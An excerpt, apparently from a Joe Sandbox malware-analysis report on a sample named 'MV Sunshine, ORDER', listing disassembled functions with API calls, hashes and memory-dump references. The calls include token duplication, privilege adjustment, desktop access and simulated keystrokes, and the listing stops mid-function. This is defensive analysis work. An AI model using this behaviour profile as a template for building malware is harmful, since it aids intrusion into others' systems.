                      • Snapshot File: hcaresult_0_2_2220000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                      • String ID:
                      • API String ID: 2438371351-0
                      • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                      • Instruction ID: 4500e46207a492d130920dd042d49b9280702f2c1823973f68cbda5179ca2e3b
                      • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                      • Instruction Fuzzy Hash: 5312EE24E24658C6EB24DF60D8507DEB232EF68300F1090E9910DEB7A5E77A4F95CF5A
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID:
                      • API String ID: 4104443479-0
                      • Opcode ID: 270eceb12a96a73d3ff24fe8e99f789d393aac14128276be90c1ddf2aac185e9
                      • Instruction ID: c6734c64da4e292a3ee836439c5ab3f1e34eb077fb7c13c2ea377b96aa03ce09
                      • Opcode Fuzzy Hash: 270eceb12a96a73d3ff24fe8e99f789d393aac14128276be90c1ddf2aac185e9
                      • Instruction Fuzzy Hash: DE31B279208A02DFC724AF58C490A21F7A4FF49310B24C56DE98ACB765E730EC81DB95
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ClearVariant
                      • String ID:
                      • API String ID: 1473721057-0
                      • Opcode ID: 8c008afa125a47722abb3de1f13ebffffdf5649cdc3e830417d4fb8f1fe5bf92
                      • Instruction ID: b0b608f39b5916d44382273824ab726c49d0a0eee1330458684e0a3d0627261d
                      • Opcode Fuzzy Hash: 8c008afa125a47722abb3de1f13ebffffdf5649cdc3e830417d4fb8f1fe5bf92
                      • Instruction Fuzzy Hash: BD410774908351CFDB24DF14C484B1ABBE4BF85318F19899DE8998B762C376E845CB52
                      APIs
                        • Part of subcall function 00984D13: FreeLibrary.KERNEL32(00000000,?), ref: 00984D4D
                        • Part of subcall function 009A548B: __wfsopen.LIBCMT ref: 009A5496
                      • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00A462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00984F6F
                        • Part of subcall function 00984CC8: FreeLibrary.KERNEL32(00000000), ref: 00984D02
                        • Part of subcall function 00984DD0: _memmove.LIBCMT ref: 00984E1A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Library$Free$Load__wfsopen_memmove
                      • String ID:
                      • API String ID: 1396898556-0
                      • Opcode ID: 8ac513056c3ef2575554c99906de75eb8caf6964b71f0f9e6e44ca3940f75cde
                      • Instruction ID: bd001cd51ed6179766785e84359d278d3a159659c2e78a393b3ba0f423936e95
                      • Opcode Fuzzy Hash: 8ac513056c3ef2575554c99906de75eb8caf6964b71f0f9e6e44ca3940f75cde
                      • Instruction Fuzzy Hash: A8110A3160030AABCB10FF74DC12FAE77A99FC4710F10882DF581A73C1DA759A059B90
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ClearVariant
                      • String ID:
                      • API String ID: 1473721057-0
                      • Opcode ID: 5fe2e0420270829f1128712643c1660e7f70c38f384b48b11377b431853e77a6
                      • Instruction ID: d3010b65ec57bfbe6049486bc547fa7cd68955f6527f92b185a9f9ae1d3aa9de
                      • Opcode Fuzzy Hash: 5fe2e0420270829f1128712643c1660e7f70c38f384b48b11377b431853e77a6
                      • Instruction Fuzzy Hash: A92142B4908341CFDB24EF54C484B1ABBE4BF89304F09896CE89A57762D731E845CB93
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID:
                      • API String ID: 4104443479-0
                      • Opcode ID: 655c4edcc936791763e04923be4c22679df8ae5058c891d1c595f59b22235dd7
                      • Instruction ID: 51eb46c8acccc539311c9e081ecc7a07071c66d12dc9c9c45e367ed022754b86
                      • Opcode Fuzzy Hash: 655c4edcc936791763e04923be4c22679df8ae5058c891d1c595f59b22235dd7
                      • Instruction Fuzzy Hash: 8001F9722047017ED3206F79CC02F67FB98EB85760F20852EF65ACA2D1EA31E4408790
                      APIs
                      • __lock_file.LIBCMT ref: 009A4AD6
                        • Part of subcall function 009A8D68: __getptd_noexit.LIBCMT ref: 009A8D68
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: __getptd_noexit__lock_file
                      • String ID:
                      • API String ID: 2597487223-0
                      • Opcode ID: 33bc1e485a65d4c0c8cc3682334d0804827489e61d13381ae191e00cb405c802
                      • Instruction ID: eca2aa9b692a7c2bd9f6307ec0e1af34748be39dd8ab553977d80fa87c80f93b
                      • Opcode Fuzzy Hash: 33bc1e485a65d4c0c8cc3682334d0804827489e61d13381ae191e00cb405c802
                      • Instruction Fuzzy Hash: 34F0C831940209ABDF51AFB4CC063DF7665AFC2325F144514F414AA1D1CBB88961DFD5
                      APIs
                      • FreeLibrary.KERNEL32(?,?,00A462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00984FDE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: 136bf52214d3dd9c4b2080a28a83a7eae3c2cf0f3927a9f08a123e6241dd8e37
                      • Instruction ID: 63ebbc5316b8b5935140e401606ec976e8fee2ef4f419462e7753b9b06e484d6
                      • Opcode Fuzzy Hash: 136bf52214d3dd9c4b2080a28a83a7eae3c2cf0f3927a9f08a123e6241dd8e37
                      • Instruction Fuzzy Hash: 98F03971505722CFCB34AF64E894912BBE5BF153293208A3EE2D682B10C735A840DF40
                      APIs
                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009A09F4
                        • Part of subcall function 00987D2C: _memmove.LIBCMT ref: 00987D66
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: LongNamePath_memmove
                      • String ID:
                      • API String ID: 2514874351-0
                      • Opcode ID: 762fff13619c7c2eaa5b349211359942c6cd9ee8f82ef36d5bd6b48c1eb64919
                      • Instruction ID: 6eaf88aab68bff0f11098e7341e65bbe15418c342813aa66ac9612c9f7735124
                      • Opcode Fuzzy Hash: 762fff13619c7c2eaa5b349211359942c6cd9ee8f82ef36d5bd6b48c1eb64919
                      • Instruction Fuzzy Hash: 18E086369042285BC720E6989C05FFAB7ADDFC87A0F0401B5FC0CD7249E960AC828690
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: __fread_nolock
                      • String ID:
                      • API String ID: 2638373210-0
                      • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                      • Instruction ID: 0be545ccb71d8d7643a6858f83bf0cd491238845ad8d62f3ab9a035438f58c8e
                      • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                      • Instruction Fuzzy Hash: 75E092B0208B405FD7358A24D8107E373E4BB06315F00081CF29AC3342EB62BC418759
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: __wfsopen
                      • String ID:
                      • API String ID: 197181222-0
                      • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                      • Instruction ID: 41c3f020c868966108b2cb9befa323a9ae4b6808c6cf0eade0b653b4293c2966
                      • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                      • Instruction Fuzzy Hash: E6B0927694020C7BDE012E82EC02B593F599B85678F808020FB0C18172A673A6A096C9
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                      • Instruction ID: 2bcec30cdea35d52332ec49d890e4a0a6bbd0184ad3be6049ff244afb267e829
                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                      • Instruction Fuzzy Hash: 5031E370A00105DFCB18DF58D480969F7AAFF9A300B788AA5E40ADB651EB31EDC1DBC0
                      APIs
                      • Sleep.KERNELBASE(000001F4), ref: 022222B1
                      Memory Dump Source
                      • Source File: 00000000.00000002.1692712668.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2220000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                      • Instruction ID: 03b42c0e2dc75e39f090e68b58a6525c3bfa82716fde3c91d6a4b497ffa9db19
                      • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                      • Instruction Fuzzy Hash: 81E0BF7494010EEFDB00EFE4D9496DE7BB4EF04311F1006A1FD05D7690DB719E548A62
                      APIs
                      • Sleep.KERNELBASE(000001F4), ref: 022222B1
                      Memory Dump Source
                      • Source File: 00000000.00000002.1692712668.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2220000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                      • Instruction ID: 441ce1807c50e73dab1eb1e8b6e40130c233ccd1c1bbaf77fc3984557789007e
                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                      • Instruction Fuzzy Hash: 62E0E67494010EEFDB00EFF4D94969E7FB4EF04301F100261FD01D2280D6719D508A72
                      APIs
                        • Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623
                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00A0CE50
                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A0CE91
                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00A0CED6
                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A0CF00
                      • SendMessageW.USER32 ref: 00A0CF29
                      • _wcsncpy.LIBCMT ref: 00A0CFA1
                      • GetKeyState.USER32(00000011), ref: 00A0CFC2
                      • GetKeyState.USER32(00000009), ref: 00A0CFCF
                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A0CFE5
                      • GetKeyState.USER32(00000010), ref: 00A0CFEF
                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A0D018
                      • SendMessageW.USER32 ref: 00A0D03F
                      • SendMessageW.USER32(?,00001030,?,00A0B602), ref: 00A0D145
                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00A0D15B
                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00A0D16E
                      • SetCapture.USER32(?), ref: 00A0D177
                      • ClientToScreen.USER32(?,?), ref: 00A0D1DC
                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00A0D1E9
                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00A0D203
                      • ReleaseCapture.USER32 ref: 00A0D20E
                      • GetCursorPos.USER32(?), ref: 00A0D248
                      • ScreenToClient.USER32(?,?), ref: 00A0D255
                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00A0D2B1
                      • SendMessageW.USER32 ref: 00A0D2DF
                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00A0D31C
                      • SendMessageW.USER32 ref: 00A0D34B
                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00A0D36C
                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00A0D37B
                      • GetCursorPos.USER32(?), ref: 00A0D39B
                      • ScreenToClient.USER32(?,?), ref: 00A0D3A8
                      • GetParent.USER32(?), ref: 00A0D3C8
                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00A0D431
                      • SendMessageW.USER32 ref: 00A0D462
                      • ClientToScreen.USER32(?,?), ref: 00A0D4C0
                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00A0D4F0
                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00A0D51A
                      • SendMessageW.USER32 ref: 00A0D53D
                      • ClientToScreen.USER32(?,?), ref: 00A0D58F
                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00A0D5C3
                        • Part of subcall function 009825DB: GetWindowLongW.USER32(?,000000EB), ref: 009825EC
                      • GetWindowLongW.USER32(?,000000F0), ref: 00A0D65F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                      • String ID: @GUI_DRAGID$F
                      • API String ID: 3977979337-4164748364
                      • Opcode ID: 4af8e6d1529af21130e36e8440cf2557ee7427e6f8f255ad3742386fa1a0eb36
                      • Instruction ID: 6f7517cbf1872f8846ac9153d801843f5602b86e5d466282893d53cbfa3d64ac
                      • Opcode Fuzzy Hash: 4af8e6d1529af21130e36e8440cf2557ee7427e6f8f255ad3742386fa1a0eb36
                      • Instruction Fuzzy Hash: C242AE35204349AFD725CF68D844FAABBE5FF89324F14061DF695972E0C732A852CB92
                      APIs
                      • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00A0873F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID: %d/%02d/%02d
                      • API String ID: 3850602802-328681919
                      • Opcode ID: fb92863faa6d5929f3ef8d8282b2584c7b19256761c5ed4b48fd135db2fcf727
                      • Instruction ID: b43bfd9cddf79ab29983e88559a051e9926d3fbe248d64ccb1d2395c778c36a0
                      • Opcode Fuzzy Hash: fb92863faa6d5929f3ef8d8282b2584c7b19256761c5ed4b48fd135db2fcf727
                      • Instruction Fuzzy Hash: 4212E27050024CAFEB248F64EC49FAA7BB4EF89710F204129F555EB2E1DF799942CB54
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: _memmove$_memset
                      • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                      • API String ID: 1357608183-1798697756
                      • Opcode ID: da1343959f34ed76e90d00241b9737525d8b120de78a3c73638f0a8c244d0581
                      • Instruction ID: 93d2a97755e68450be0ad92954b3fa3ac4117d757fbc96c151da0fd492ce89aa
                      • Opcode Fuzzy Hash: da1343959f34ed76e90d00241b9737525d8b120de78a3c73638f0a8c244d0581
                      • Instruction Fuzzy Hash: 7693AF71A4421A9BDF24CF98C881BADB7B5FF48310F24C56BE955AB380E7749E81CB50
                      APIs
                      • GetForegroundWindow.USER32(00000000,?), ref: 00984A3D
                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009BDA8E
                      • IsIconic.USER32(?), ref: 009BDA97
                      • ShowWindow.USER32(?,00000009), ref: 009BDAA4
                      • SetForegroundWindow.USER32(?), ref: 009BDAAE
                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 009BDAC4
                      • GetCurrentThreadId.KERNEL32 ref: 009BDACB
                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 009BDAD7
                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 009BDAE8
                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 009BDAF0
                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 009BDAF8
                      • SetForegroundWindow.USER32(?), ref: 009BDAFB
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 009BDB10
                      • keybd_event.USER32(00000012,00000000), ref: 009BDB1B
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 009BDB25
                      • keybd_event.USER32(00000012,00000000), ref: 009BDB2A
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 009BDB33
                      • keybd_event.USER32(00000012,00000000), ref: 009BDB38
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 009BDB42
                      • keybd_event.USER32(00000012,00000000), ref: 009BDB47
                      • SetForegroundWindow.USER32(?), ref: 009BDB4A
                      • AttachThreadInput.USER32(?,?,00000000), ref: 009BDB71
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                      • String ID: Shell_TrayWnd
                      • API String ID: 4125248594-2988720461
                      • Opcode ID: 464f4d8c11666cd89cb00d79c690f6808ff8273f2ceaf8392d87a5ff744a0208
                      • Instruction ID: 5a96a6b45f75a1387a1ed148efc7448c8c993b20909f4c9196d17a0f480f6645
                      • Opcode Fuzzy Hash: 464f4d8c11666cd89cb00d79c690f6808ff8273f2ceaf8392d87a5ff744a0208
                      • Instruction Fuzzy Hash: 41315571A4131C7FEB31AFA19C49FBE7E6CEB44B60F114025FA04F61D0D6B15902ABA1
                      APIs
                        • Part of subcall function 009D8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009D8D0D
                        • Part of subcall function 009D8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009D8D3A
                        • Part of subcall function 009D8CC3: GetLastError.KERNEL32 ref: 009D8D47
                      • _memset.LIBCMT ref: 009D889B
                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 009D88ED
                      • CloseHandle.KERNEL32(?), ref: 009D88FE
                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 009D8915
                      • GetProcessWindowStation.USER32 ref: 009D892E
                      • SetProcessWindowStation.USER32(00000000), ref: 009D8938
                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 009D8952
                        • Part of subcall function 009D8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009D8851), ref: 009D8728
